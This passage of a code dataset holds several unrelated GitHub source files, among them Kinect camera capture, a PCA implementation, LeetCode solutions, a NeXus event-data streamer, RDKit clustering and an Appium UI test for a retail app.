print(\"Simulated Kinect4 (no device)\")\n        self.COLOR_HGT = 1536\n        self.COLOR_WID = 2048\n        self.DEPTH_HGT = 576\n        self.DEPTH_WID = 640\n        self.distCoeffs = np.array([0.513059, -2.77779, -0.000323, 0.000703, 1.62693, 0.391017, -2.593868, 1.548565])\n        self.cameramtx = np.array([[976.405945, 0, 1020.967651],\n                                   [0, 976.266479, 779.519653],\n                                   [0, 0, 1]])\n    \n    def get_capture(self):\n        color_filename, depth_filename = \"D:/CODE&DATA/CODE/robot_grasp/data/scene/MYDATA/rgb/0.png\", \"D:/CODE&DATA/CODE/robot_grasp/data/scene/MYDATA/depth/0.png\"\n        img_color = cv2.imread(color_filename)\n        img_depth = cv2.imread(depth_filename, cv2.IMREAD_ANYDEPTH)\n        return img_color, img_depth\n\n\nclass BOP_simulated:\n    def __init__(self):\n        print(\"Simulated BOP camera\")\n        self.COLOR_HGT = 480\n        self.COLOR_WID = 640\n        self.DEPTH_HGT = 480\n        self.DEPTH_WID = 640\n        self.distCoeffs = np.array([0, 0, 0, 0, 0])\n        self.cameramtx = np.array([572.4114, 0.0, 325.2611, 0.0, 573.57043, 242.04899, 0.0, 0.0, 1.0], dtype=float).reshape(3, 3)\n    \n    def get_capture(self):\n        color_filename, depth_filename = \"data/scene/BOP/rgb/000000.png\", \"data/scene/BOP/depth/000000.png\"\n        img_color = cv2.imread(color_filename)\n        img_depth = cv2.imread(depth_filename, cv2.IMREAD_ANYDEPTH)\n        return img_color, img_depth\n    \ndef read_save_kinect2():\n    root = \"../data/kinect2/\"\n    cam = kinect2()\n    cnt = 0\n    skip = 20 # skip the first 20 frames\n    while 1:\n        # start = time.time()\n        img_color = cam.read_color_frame()\n        gray = cam.read_gray_frame()\n        img_depth = cam.read_depth_frame()\n        # print(\"FPS:\", 1/(time.time()-start))\n        cv2.imshow(\"img_color\", img_color)\n        cv2.imshow(\"gray\", gray)\n        key = cv2.waitKey(500)\n        skip -= 1\n        if key == 115 and skip <= 0: # 's' key pressed\n            filename = root + \"rgb/\" + str(cnt) + \".png\"\n            print(\"writing file: \", filename)\n            cv2.imwrite(filename, img_color)\n            filename = root + \"gray/\" + str(cnt) + \".png\"\n            print(\"writing file: \", filename)\n            cv2.imwrite(filename, gray)\n            filename = root + \"depth/\" + str(cnt) + \".png\"\n            print(\"writing file: \", filename)\n            cv2.imwrite(filename, img_depth)\n            cnt += 1\n\ndef read_save_kinect4():\n    root = \"../data/kinect4/\"\n    cam = kinect4()\n    cnt = 0\n    skip = 5 # skip the first 5 frames\n    while 1:\n        img_color, img_depth = cam.get_capture()\n        img_depth_show = img_depth.copy()\n        img_depth_show -= np.amin(img_depth_show)\n        img_depth_show = img_depth_show / np.amax(img_depth_show)\n        img_depth_show *= 255\n        cv2.imshow(\"ir\", img_depth_show)\n        cv2.imshow(\"img_color\", img_color)\n\n        key = cv2.waitKey(10)\n        skip -= 1\n        if key == 115 and skip <= 0: # 's' key pressed\n            filename = root + \"rgb/\" + str(cnt) + \".png\"\n            print(\"writing file: \", filename)\n            cv2.imwrite(filename, img_color)\n            filename = root + \"depth/\" + str(cnt) + \".png\"\n            print(\"writing file: \", filename)\n            cv2.imwrite(filename, img_depth)\n            cnt += 1\n\ndef undistort_test():\n    cam = kinect4()\n    img_color, img_depth = cam.get_capture()\n    \n    newcameramtx, roi = cv2.getOptimalNewCameraMatrix(cam.cameramtx, cam.distCoeffs, img_color.shape[1::-1], 1)\n    map1, map2 = cv2.initUndistortRectifyMap(cam.cameramtx, cam.distCoeffs, None, newcameramtx,\n                                             img_color.shape[1::-1], cv2.CV_32FC1)\n    cameramtx = newcameramtx\n    \n    while 1:\n        start = time.time()\n        img_color, img_depth = cam.get_capture()\n        print(\"read frame FPS: \", 1/(time.time() - start))\n        img_depth_show = img_depth.copy()\n        img_depth_show -= np.amin(img_depth_show)\n        img_depth_show = img_depth_show / np.amax(img_depth_show)\n        img_depth_show *= 255\n        cv2.imshow(\"ir\", img_depth_show)\n        cv2.imshow(\"img_color\", img_color)\n        start = 
time.time()\n        img_color_undistort = cv2.remap(img_color, map1, map2, cv2.INTER_NEAREST)\n        print(\"cost time:\", time.time()-start)\n        cv2.imshow(\"img_color_undistort\", img_color_undistort)\n        cv2.waitKey(1)\n    \n    \nif __name__ == \"__main__\":\n    undistort_test()\n","repo_name":"ZhangLanTao/Robot-Grab-using-PointCloud","sub_path":"hardware/camera/kinect.py","file_name":"kinect.py","file_ext":"py","file_size_in_byte":6711,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"}
{"seq_id":"9041382441","text":"import numpy as np\n\n\nclass PCA:\n    def __init__(self, n_components: int) -> None:\n        self.n_components = n_components\n        self.components = None\n        self.mean = None\n\n    def fit(self, X):\n        # mean\n        self.mean = np.mean(X, axis=0)\n        X = X-self.mean\n\n        # covariance\n        # in X row is sample && column in each feature { here we taking transpose is because in the documentation of np.cov it is the other way around ie row is feature and column is sample}\n        cov = np.cov(X.T)\n\n        eigen_values, eigen_vectors = np.linalg.eig(cov)\n        eigen_vectors = eigen_vectors.T\n\n        # sort eigenvectors\n        idxs = np.argsort(eigen_values)[::-1]\n        # capturing most important eigen values\n        eigen_values = eigen_values[idxs]\n        # eigen vectors corresponding eigen values\n        eigen_vectors = eigen_vectors[idxs]\n\n        # store first n eigenvectors\n        self.components = eigen_vectors[:self.n_components]\n        print(self.components.shape)\n        print(self.mean.shape, 'mean')\n\n    def transform(self, X):\n        # project data\n        X = X - self.mean # in the eqn of the covariance\n        res = np.dot(X, self.components.T)\n        self.new_mean = np.mean(res, axis=0)\n        return res\n\n    def inverse_transform(self, reduced_X):\n        reduced_X = reduced_X - self.new_mean\n        return np.dot(reduced_X, self.components)\n","repo_name":"rohit-krish/MLAlgosFromScratch","sub_path":"Dimentionality Reduction/PCA Image Reconstruction/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
{"seq_id":"11462460354","text":"### q1\ndef haveConflict(self, event1: List[str], event2: List[str]) -> bool:\n    \n    def gett(time):\n        h,m=time.split(':')\n        h=int(h)\n        m=int(m)\n        return h*60 + m\n    \n    s1 = gett(event1[0])\n    e1 = gett(event1[1]) \n    s2 = gett(event2[0])\n    e2 = gett(event2[1]) \n    \n    change=defaultdict(int)\n\n    change[s1]+=1\n    change[e1+1]-=1\n    change[s2]+=1\n    change[e2+1]-=1\n    \n    \n    # print(change)\n    cur=0\n    mx = 0\n    for key in sorted(change.keys()):\n        cur +=change[key]\n        if cur==2:\n            return True\n        mx = max(mx, cur)\n    return False\n### q2\n# greatest common factor\n# O(log(min(a, b))\ndef gcd(a, b):\n    while b: \n        a, b = b, a % b\n    return a\n# gcd\ndef subarrayGCD(self, nums: List[int], k: int) -> int:\n    def hcf(a, b):\n        if(b == 0):\n            return a\n        else:\n            return hcf(b, a % b)\n    n = len(nums)\n    count=0\n    for i in range(n):\n        num = nums[i]\n        if nums[i]==k:\n            count+=1\n        for j in range(i+1,n):\n            num = hcf(num,nums[j])\n            if num==k:\n                count+=1\n    return count\n    \n### Q3\nclass Solution:\n    def minCost(self, nums: List[int], cost: List[int]) -> int:\n        \n        def getcost(target):\n            res=0\n            for i in range(len(nums)):\n                res+=abs(target-nums[i])*cost[i]\n            return res\n        \n        n = len(nums)\n        l,r=1,10**6\n        \n        while l<r:\n            mid=(l+r)//2\n            a=getcost(mid)\n            b=getcost(mid+1)\n            ans=min(a,b)\n            if a>=1 and a< b:\n                r=mid\n            else:\n                l=mid+1\n        \n        return ans\n    
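# Hand-worked sanity check (not part of the original file): Solution().minCost([1, 2], [1, 1]) == 1, since any target in [1, 2] costs |t - 1| + |t - 2| = 1.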
\n","repo_name":"Johnkhk/Algorithms","sub_path":"contests/weekly_316.py","file_name":"weekly_316.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4232523085","text":"import h5py\nfrom typing import Tuple, Optional, Generator, Callable, Union\nimport numpy as np\nfrom .application_logger import get_logger\nfrom .convert_units import (\n get_to_nanoseconds_conversion_method,\n iso8601_to_ns_since_epoch,\n)\nfrom pint.errors import UndefinedUnitError\nfrom .source_error import BadSource\n\n\nclass _ChunkDataLoader:\n def __init__(self, dataset: h5py.Dataset):\n self._dataset = dataset\n self._chunk_iterator = self._dataset.iter_chunks()\n next_slice = next(self._chunk_iterator)\n self._current_chunk = self._dataset[next_slice]\n self._start_index: int = 0\n\n def get_data_for_pulse(\n self, pulse_start_event: int, pulse_end_event: int\n ) -> np.ndarray:\n start_index = int(pulse_start_event - self._start_index)\n end_index = int(pulse_end_event - self._start_index)\n\n data_for_pulse = np.array([], dtype=self._current_chunk.dtype)\n while True:\n # If all the data we need is in the current, cached chunk,\n # then just append and return it\n if end_index < self._current_chunk.size:\n return np.append(\n data_for_pulse, self._current_chunk[start_index:end_index]\n )\n # else...\n # we need all the data in the current chunk...\n data_for_pulse = np.append(\n data_for_pulse, self._current_chunk[start_index:]\n )\n # and at least some from the next chunk, so load the next chunk and continue\n end_index -= self._current_chunk.size\n start_index = 0\n self._start_index += self._current_chunk.size\n try:\n next_slice = next(self._chunk_iterator)\n except StopIteration:\n return data_for_pulse\n self._current_chunk = self._dataset[next_slice]\n\n\nclass _ContiguousDataLoader:\n def __init__(self, dataset: h5py.Dataset):\n self._dataset = dataset\n max_bytes_willing_to_load_into_memory = 100_000_000 # 100 MB\n if self._dataset.nbytes < max_bytes_willing_to_load_into_memory:\n self._dataset = self._dataset[...]\n elif self._dataset.compression is not None:\n get_logger().warning(\n f\"{self._dataset.name} is larger than {max_bytes_willing_to_load_into_memory} bytes,\"\n f\"contiguous and compressed, it will be very slow to stream if these event data are from many pulses\"\n )\n\n def get_data_for_pulse(\n self, pulse_start_event: int, pulse_end_event: int\n ) -> np.ndarray:\n return self._dataset[pulse_start_event:pulse_end_event]\n\n\n_DataLoader = Union[_ChunkDataLoader, _ContiguousDataLoader]\n\n\ndef _get_pulse_time_offset_in_ns(pulse_time_dataset: h5py.Group) -> int:\n \"\"\"\n Gives an offset which, when added to pulse times, results in time relative to unix epoch\n \"\"\"\n try:\n date_string = pulse_time_dataset.attrs[\"offset\"]\n except KeyError:\n # If no \"offset\" attribute then times are already relative to unix epoch according to NeXus standard\n return 0\n return iso8601_to_ns_since_epoch(date_string)\n\n\nclass EventDataSource:\n def __init__(self, group: h5py.Group):\n \"\"\"\n Load data, one pulse at a time from NXevent_data in NeXus file\n :raises BadSource if there is a critical problem with the data source\n \"\"\"\n self._group = group\n self._logger = get_logger()\n self._tof_loader: _DataLoader\n self._id_loader: _DataLoader\n\n if self._has_missing_fields():\n raise BadSource()\n try:\n self._convert_pulse_time = _get_pulse_time_unit_converter(group)\n 
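# Both converters normalise the stored time units to nanoseconds via get_to_nanoseconds_conversion_method.\n            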
self._convert_event_time = self._get_event_time_unit_converter()\n except UndefinedUnitError:\n self._logger.error(\n f\"Unable to publish data from NXevent_data at {self._group.name} due to unrecognised \"\n f\"or missing units for time field\"\n )\n raise BadSource()\n\n self._event_time_zero = self._group[\"event_time_zero\"][...]\n self._event_index = self._group[\"event_index\"][...]\n\n # There is some variation in the last recorded event_index in files from different institutions\n # for example ISIS files often have what would be the first index of the next pulse at the end.\n # This logic hopefully covers most cases\n if self._event_index[-1] < self._group[\"event_id\"].len():\n self._event_index = np.append(\n self._event_index,\n np.array([self._group[\"event_id\"].len() - 1]).astype(\n self._event_index.dtype\n ),\n )\n else:\n self._event_index[-1] = self._group[\"event_id\"].len()\n\n try:\n self._group[\"event_time_offset\"].iter_chunks()\n self._tof_loader = _ChunkDataLoader(self._group[\"event_time_offset\"])\n except TypeError:\n self._tof_loader = _ContiguousDataLoader(self._group[\"event_time_offset\"])\n\n try:\n self._group[\"event_id\"].iter_chunks()\n self._id_loader = _ChunkDataLoader(self._group[\"event_id\"])\n except TypeError:\n self._id_loader = _ContiguousDataLoader(self._group[\"event_id\"])\n\n self._pulse_time_offset_ns = _get_pulse_time_offset_in_ns(\n self._group[\"event_time_zero\"]\n )\n\n @property\n def final_timestamp(self) -> int:\n # Last pulse time is good enough, we won't try to find the last event in the last pulse\n return (\n self._convert_pulse_time(self._event_time_zero[-1])\n + self._pulse_time_offset_ns\n )\n\n def get_data(\n self,\n ) -> Generator[Tuple[Optional[np.ndarray], Optional[np.ndarray], int], None, None]:\n \"\"\"\n Returns None instead of a data when there is no more data\n \"\"\"\n # -1 as last index would be start of the next pulse after the end of the run\n for pulse_number in range(self._event_index.size - 1):\n pulse_time = (\n self._convert_pulse_time(self._event_time_zero[pulse_number])\n + self._pulse_time_offset_ns\n )\n start_event = self._event_index[pulse_number]\n end_event = self._event_index[pulse_number + 1]\n yield self._convert_event_time(\n self._tof_loader.get_data_for_pulse(start_event, end_event)\n ), self._id_loader.get_data_for_pulse(start_event, end_event), pulse_time\n yield None, None, 0\n\n def _has_missing_fields(self) -> bool:\n missing_field = False\n required_fields = (\n \"event_time_zero\",\n \"event_index\",\n \"event_id\",\n \"event_time_offset\",\n )\n for field in required_fields:\n if field not in self._group:\n self._logger.error(\n f\"Unable to publish data from NXevent_data at {self._group.name} due to missing {field} field\"\n )\n missing_field = True\n return missing_field\n\n def _get_event_time_unit_converter(self) -> Callable:\n try:\n units = self._group[\"event_time_offset\"].attrs[\"units\"]\n except AttributeError:\n raise UndefinedUnitError\n return get_to_nanoseconds_conversion_method(units)\n\n @property\n def name(self):\n return self._group.name.split(\"/\")[-1]\n\n\ndef _get_pulse_time_unit_converter(group: h5py.Group) -> Callable:\n try:\n units = group[\"event_time_zero\"].attrs[\"units\"]\n except AttributeError:\n raise UndefinedUnitError\n return get_to_nanoseconds_conversion_method(units)\n\n\nclass FakeEventDataSource:\n def __init__(self, group: h5py.Group, events_per_pulse: int):\n logger = get_logger()\n try:\n self._detector_ids = 
group.parent[\"detector_number\"][...]\n except KeyError:\n logger.error(\n \"detector_number dataset not found in parent group of \"\n \"NXevent_data, this must be present when using \"\n \"--fake-events-per-pulse\"\n )\n raise BadSource()\n self._events_per_pulse = events_per_pulse\n\n self._event_time_zero = group[\"event_time_zero\"][...]\n self._convert_pulse_time = _get_pulse_time_unit_converter(group)\n\n self._pulse_time_offset_ns = _get_pulse_time_offset_in_ns(\n group[\"event_time_zero\"]\n )\n self._rng = np.random.default_rng(12345)\n\n self.name = group.name.split(\"/\")[-1]\n\n @property\n def final_timestamp(self) -> int:\n # Last pulse time is good enough, we won't try to find the last event in the last pulse\n return (\n self._convert_pulse_time(self._event_time_zero[-1])\n + self._pulse_time_offset_ns\n )\n\n def get_data(\n self,\n ) -> Generator[Tuple[Optional[np.ndarray], Optional[np.ndarray], int], None, None]:\n \"\"\"\n Returns None instead of a data when there is no more data\n \"\"\"\n for pulse_number in range(self._event_time_zero.size):\n pulse_time = (\n self._convert_pulse_time(self._event_time_zero[pulse_number])\n + self._pulse_time_offset_ns\n )\n\n tofs = self._rng.integers(\n low=10000, high=10000000, size=self._events_per_pulse\n )\n detector_num_indices = self._rng.integers(\n low=0, high=self._detector_ids.size, size=self._events_per_pulse\n )\n ids = self._detector_ids[detector_num_indices]\n\n yield tofs, ids, pulse_time\n yield None, None, 0\n","repo_name":"ess-dmsc/nexus-streamer-python","sub_path":"src/nexus_streamer/event_data_source.py","file_name":"event_data_source.py","file_ext":"py","file_size_in_byte":9747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43159973133","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nfrom scraper_util import *\n\nif __name__ == '__main__':\n csv_out = csv.writer(open(\"universities.csv\", \"a\"))\n csv_out.writerow([\"UNIVERSITY\", \"URL\", \"STATE\"])\n start = 1\n while start < 2100:\n raw_html = getRawHtml(\"http://univ.cc/search.php?dom=edu&key=&start=%s\" % start)\n bs_struct = BeautifulSoup(raw_html, \"html.parser\")\n for institution in bs_struct.find_all('li'):\n links = institution.find_all('a', href=True)\n if len(links) != 0:\n link = links[0]\n university_name = link.text.encode('utf-8')\n url = link['href'].encode('utf-8')\n csv_out.writerow([university_name, url])\n start += 50\n\n\n\n\n\n\n","repo_name":"tristantao/burster","sub_path":"gen_university.py","file_name":"gen_university.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22474529441","text":"from utilidadesCeV.menu import *\nfrom utilidadesCeV.arquivo import *\n\n\nArq = 'Desafios\\\\arquivo01Exercicio115.txt'\nif arquivoExiste(Arq):\n print('Arquivo Localizado.')\nelse:\n criarArquivo(Arq)\n print(f'Arquivo {Arq} Criado com Sucesso.')\n \n\nwhile True:\n n = menu(['Cadastrar Pessoas','Lista de Pessoas','Sair do Sistema'])\n if n == 3:\n final()\n break\n elif n == 1:\n cabecalho('Cadastrar Pessoas')\n nome = str(input('Nome: ')).title().strip() \n idade = leiaInt('Idade: ')\n cadastrarPessoa(Arq, nome, idade)\n elif n == 2:\n cabecalho('Lista de Pessoas')\n lerArquivo(Arq)\n else:\n cabecalho('Opção 
Invalida!')","repo_name":"josivantarcio/Desafios-em-Python","sub_path":"Desafios/desafio115.py","file_name":"desafio115.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30678572138","text":"from __future__ import print_function\n\nimport argparse\nimport collections\nimport uuid\n\nfrom rdkit import rdBase\n\nfrom . import cluster_butina\nfrom pipelines_utils import parameter_utils, utils\nfrom pipelines_utils_rdkit import rdkit_utils\n\n### start field name defintions #########################################\n\nfield_Similarity = \"Similarity\"\n\n### functions #########################################\n\n\ndef MapClusterToMols(clusters, mols):\n i = 0\n for cluster in clusters:\n print(\"Cluster:\", i, cluster)\n for c in cluster:\n # print(\"Assigning mol\",c,\"to cluster\",i)\n mols[c].SetIntProp(\"Cluster\", i)\n i += 1\n j = 0\n for mol in mols:\n mol.SetIntProp(\"MolNum\", j)\n j += 1\n # print(mol.GetPropsAsDict())\n\ndef MapClusterToMols(clusters, mols):\n i = 0\n for cluster in clusters:\n print(\"Cluster:\", i, cluster)\n for c in cluster:\n # print(\"Assigning mol\",c,\"to cluster\",i)\n mols[c].SetIntProp(\"Cluster\", i)\n i += 1\n j = 0\n for mol in mols:\n mol.SetIntProp(\"MolNum\", j)\n j += 1\n # print(mol.GetPropsAsDict())\n\n\ndef GetDistance(x, y, matrix):\n if x == y:\n return 1.0\n if x > y:\n x2 = y\n y2 = x\n else:\n x2 = x\n y2 = y\n # print(\"row\",\",\".join([\"%.2f\" % x for x in matrix[y2-1]]))\n return matrix[y2 - 1][x2]\n\n\ndef GenerateId(cluster, structure):\n row = \"%03i\" % cluster\n row += \".\"\n row += \"%04i\" % structure\n return row\n\n\n### start main execution #########################################\n\ndef main():\n\n ### command line args defintions #########################################\n\n parser = argparse.ArgumentParser(description='RDKit Butina Cluster Matrix')\n parameter_utils.add_default_input_args(parser)\n parser.add_argument('-o', '--output', help=\"Base name for output file (no extension). If not defined then SDTOUT is used for the structures and output is used as base name of the other files.\")\n parser.add_argument('-of', '--outformat', choices=['tsv', 'json'], default='tsv', help=\"Output format. 
Defaults to 'tsv'.\")\n parser.add_argument('--meta', action='store_true', help='Write metadata and metrics files')\n parser.add_argument('-t', '--threshold', type=float, default=0.7, help='Similarity clustering threshold (1.0 means identical)')\n parser.add_argument('-mt', '--matrixThreshold', type=float, default=0.5, help='Threshold for outputting values (1.0 means identical)')\n parser.add_argument('-d', '--descriptor', type=str.lower, choices=list(cluster_butina.descriptors.keys()), default='rdkit', help='descriptor or fingerprint type (default rdkit)')\n parser.add_argument('-m', '--metric', type=str.lower, choices=list(cluster_butina.metrics.keys()), default='tanimoto', help='similarity metric (default tanimoto)')\n parser.add_argument('-q', '--quiet', action='store_true', help='Quiet mode')\n\n args = parser.parse_args()\n utils.log(\"Cluster Matrix Args: \", args)\n\n descriptor = cluster_butina.descriptors[args.descriptor]\n if descriptor is None:\n raise ValueError('Invalid descriptor name ' + args.descriptor)\n\n input,suppl = rdkit_utils.default_open_input(args.input, args.informat)\n\n # handle metadata\n source = \"cluster_butina_matrix.py\"\n datasetMetaProps = {\"source\":source, \"description\": \"Butina clustering using RDKit \" + rdBase.rdkitVersion}\n clsMappings = {\n \"Cluster1\": \"java.lang.Integer\",\n \"Cluster2\": \"java.lang.Integer\",\n \"ID1\": \"java.lang.String\",\n \"ID2\": \"java.lang.String\",\n \"M1\": \"java.lang.String\",\n \"M2\": \"java.lang.String\",\n \"Similarity\": \"java.lang.Float\"\n }\n fieldMetaProps = [{\"fieldName\":\"Cluster\", \"values\": {\"source\":source, \"description\":\"Cluster number\"}}]\n\n fieldNames = collections.OrderedDict()\n fieldNames['ID1'] = 'ID1'\n fieldNames['ID2'] ='ID2'\n fieldNames['Cluster1'] = 'Cluster1'\n fieldNames['Cluster2'] = 'Cluster2'\n fieldNames['Similarity'] = 'Similarity'\n fieldNames['M1'] = 'M1'\n fieldNames['M2'] = 'M2'\n\n writer,output_base = utils.\\\n create_simple_writer(args.output, 'cluster_butina_matrix',\n args.outformat, fieldNames,\n valueClassMappings=clsMappings,\n datasetMetaProps=datasetMetaProps,\n fieldMetaProps=fieldMetaProps)\n\n\n ### generate fingerprints\n mols = [x for x in suppl if x is not None]\n fps = [descriptor(x) for x in mols]\n input.close()\n\n\n ### do clustering\n utils.log(\"Clustering with descriptor\", args.descriptor, \"metric\", args.metric, \"and threshold\", args.threshold)\n clusters, dists, matrix, = cluster_butina.ClusterFps(fps, args.metric, 1.0 - args.threshold)\n utils.log(\"Found\", len(clusters), \"clusters\")\n\n MapClusterToMols(clusters, mols)\n\n if not args.quiet:\n utils.log(\"Clusters:\", clusters)\n\n writer.writeHeader()\n\n size = len(matrix)\n #utils.log(\"len(matrix):\", size)\n count = 0\n for i in range(size ):\n #utils.log(\"element\",i, \"has length\", len(matrix[i]))\n writer.write(create_values(mols, i, i, 1.0))\n count += 1\n for j in range(len(matrix[i])):\n #utils.log(\"writing\",i,j)\n dist = matrix[i][j]\n if dist > args.matrixThreshold:\n # the matrix is the lower left segment without the diagonal\n x = j\n y = i + 1\n writer.write(create_values(mols, x, y, dist))\n writer.write(create_values(mols, y, x, dist))\n count += 2\n writer.write(create_values(mols, size, size, 1.0))\n\n writer.writeFooter()\n writer.close()\n\n if args.meta:\n utils.write_metrics(output_base, {'__InputCount__':i, '__OutputCount__':count, 'RDKitCluster':i})\n\n\ndef create_values(mols, x, y, dist):\n c1 = mols[x].GetIntProp(\"Cluster\")\n c2 = 
mols[y].GetIntProp(\"Cluster\")\n bo = collections.OrderedDict()\n bo[\"uuid\"] = str(uuid.uuid4())\n props = {}\n props[\"Cluster1\"] = c1 + 1\n props[\"Cluster2\"] = c2 + 1\n props[\"ID1\"] = GenerateId(c1 + 1, x + 1)\n props[\"ID2\"] = GenerateId(c2 + 1, y + 1)\n props[field_Similarity] = dist\n if mols[x].HasProp(\"uuid\"):\n props[\"M1\"] = mols[x].GetProp(\"uuid\")\n if mols[y].HasProp(\"uuid\"):\n props[\"M2\"] = mols[y].GetProp(\"uuid\")\n\n return props\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"InformaticsMatters/pipelines","sub_path":"src/python/pipelines/rdkit/cluster_butina_matrix.py","file_name":"cluster_butina_matrix.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"13918987275","text":"import time\nfrom appium.webdriver.common.touch_action import TouchAction\nfrom appium import webdriver\nfrom Appium_Test.mainfunction import Slide, BasicMethods\nfrom Auto_Scripts.公共��法 import Login\nfrom Appium_Test.UI流程方法 import BusProcess\nfrom Appium_Test import global_varibals\n\nLogin = Login(headers=global_varibals.headers, data=global_varibals.data)\n\"\"\"\nActivity是Android系统中的四大组件之一,可以用于显示View\n我们的智零售启动appActivity在Appium调试的时候发现必须得用通过APK包解出来的【launchable-activity】,其他页面启动会报错\n配置如下:\ncaps[\"appActivity\"] = \"com.joowing.app.activity.MainActivity\" \n\"\"\"\n#\nloading_id = 'com.joowing.nebula.online:id/center'\naccount_login_id = \"com.joowing.nebula.online:id/account_login\"\nlogin_phone_id = 'com.joowing.nebula.online:id/phone'\n# 客服按钮\niv_helper_id = 'com.joowing.nebula.online:id/iv_helper_icon'\naccount_login_json = {\n 'account_name': global_varibals.account_name,\n 'account_password': global_varibals.account_password\n}\nphone_login_json = {\n 'phone': global_varibals.phone,\n 'org_code': global_varibals.org_code\n}\n\n\n# 前置代码:Appium启动参数\ndef appium_start():\n caps = {}\n caps[\"platformName\"] = \"Android\"\n caps[\"platformVersion\"] = \"10\"\n caps[\"deviceName\"] = \"Redmi_K20_Pro_Premium_Edition\"\n caps[\"appPackage\"] = \"com.joowing.nebula.online\"\n caps[\"appActivity\"] = \"com.joowing.app.activity.MainActivity\"\n # caps[\"noReset\"] 为False时,每次调试app时会默认重置app状态为对应acctivity入口,为True则按照打开调试app时app的当前入口来操作\n caps[\"noReset\"] = False\n caps[\"ensureWebviewsHavePages\"] = True\n # 一定要开启Appium的服务\n driver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", caps)\n return driver\n\n\n# 准备实例化\ndriver = appium_start()\ndriver.implicitly_wait(20)\nSlider = Slide(driver)\nBusProcess = BusProcess(driver)\nBasicMethods = BasicMethods(driver)\n\n\n# 账号密码登录\ndef account_login(info):\n choose_id_click = BasicMethods.choose_id_click(account_login_id)\n # 模拟登录智零售后通过账号密码登录的操作,由于我的手机进入账号密码登录页面后会自动跳出可选择的账号,会影响元素定位,所以随便点个地方取消账号选择\n TouchAction(driver).tap(x=646, y=1119).perform()\n name = info['account_name']\n password = info['account_password']\n test1 = driver.find_elements_by_id(\"com.joowing.nebula.online:id/user_name\")\n # print(test1, test1[0].text)\n test1[0].send_keys(name)\n time.sleep(1)\n TouchAction(driver).tap(x=646, y=1119).perform()\n driver.find_elements_by_id(\"com.joowing.nebula.online:id/password\")[0].send_keys(password)\n login_button_id = 'com.joowing.nebula.online:id/login_button'\n driver.find_elements_by_id(login_button_id)[0].click()\n time.sleep(8)\n TouchAction(driver).tap(x=745, y=160).perform()\n\n\n# 手机号获取验证码登录\ndef phone_login(phone_login_info):\n user_captcha = \"\"\n org_code = phone_login_info['org_code']\n phone = 
phone_login_info['phone']\n phone_index = str(phone)[-4:]\n driver.find_element_by_id(login_phone_id).send_keys(phone)\n driver.find_element_by_id('com.joowing.nebula.online:id/captchaButton').click()\n index_url = f'http://jmp.joowing.com/api/ris/global/user_captcha/all_captcha?org_code={org_code}&phone_index={phone_index}'\n Jmp_Seeion = Login.JMP_Login()\n time.sleep(5)\n user_captcha_list = Jmp_Seeion.get(index_url).json()\n # print(Jmp_Seeion.get(index_url).json())\n if len(user_captcha_list) == 0:\n print('未查询到手机号!请确认手机号是否唯一')\n exit()\n else:\n user_captcha = user_captcha_list[0]['captcha']\n driver.find_element_by_id('com.joowing.nebula.online:id/captcha').send_keys(user_captcha)\n driver.find_element_by_id('com.joowing.nebula.online:id/login_button').click()\n\n\n# -----------------------------后台管理员账户登录以及UI验证流程-------------------------\ndef administrators_ui():\n account_login(account_login_json)\n # 下拉刷新下数据\n Slider.swipeDown()\n c1 = BusProcess.show_sales()\n if c1:\n print('管理员一级面板数据展示正常!')\n else:\n print(\"检测管理员一级面板数据展示异常!\")\n Slider.swipeLeft()\n Slider.swipeUp()\n c2 = BusProcess.show_sales()\n if c2:\n print('店长一级面板数据展示正常!')\n if c1:\n print(\"--------------一级面板数据验证完毕--------------------\")\n else:\n print(\"检测店长一级面板数据展示异常!\")\n Slider.swipeRight()\n\n\n# ------------------------------导购手机号登录以及UI验证流程---------------------------\ndef guider_ui():\n phone_login(phone_login_json)\n BusProcess.guider_login()\n\n\n# noinspection PyBroadException\ntry:\n administrators_ui()\n BusProcess.secondary_panel()\n BusProcess.third_panel()\nexcept Exception as e:\n print(\"--------------一级面板UI验证异常!见异常截图-------------------\")\n driver = appium_start()\n driver.implicitly_wait(20)\n Slider = Slide(driver)\n administrators_ui()\n BusProcess.secondary_panel()\n BusProcess.third_panel()\n","repo_name":"Ring5S/yuhao_Testcase","sub_path":"Appium_Test/nebula_ui.py","file_name":"nebula_ui.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"20311562458","text":"from __future__ import absolute_import, unicode_literals, print_function\n\nimport re\nimport difflib\ntry:\n import html.entities as htmlentitydefs\nexcept ImportError: # Python 2\n import htmlentitydefs # pylint: disable=import-error,wrong-import-order\nfrom xml.sax.saxutils import quoteattr # pylint: disable=wrong-import-order\n\nimport arrow\nfrom munch import munchify as bunchify\nfrom lxml.etree import fromstring, HTMLParser, XMLParser, XMLSyntaxError # pylint: disable=no-name-in-module\nfrom rudiments.reamed import click\n\nfrom .._compat import BytesIO\n\n\n# Mapping of CLI content format names to Confluence API names\nCLI_CONTENT_FORMATS = dict(view='view', editor='editor', storage='storage', export='export_view', anon='anonymous_export_view')\n\n# Simple replacement rules, order is important!\nTIDY_REGEX_RULES = ((_name, re.compile(_rule), _subst) for _name, _rule, _subst in [\n (\"FosWiki: Remove CSS class from section title\",\n r'<(h[1-5]) class=\"[^\"]*\">', r'<\\1>'),\n (\"FosWiki: Remove static section numbering\",\n r'(?<=)(|)[0-9.]+?\\s*(?= )', r'\\1'),\n (\"FosWiki: Empty anchor in headers\",\n r'(?<=)\\s* +', ''),\n 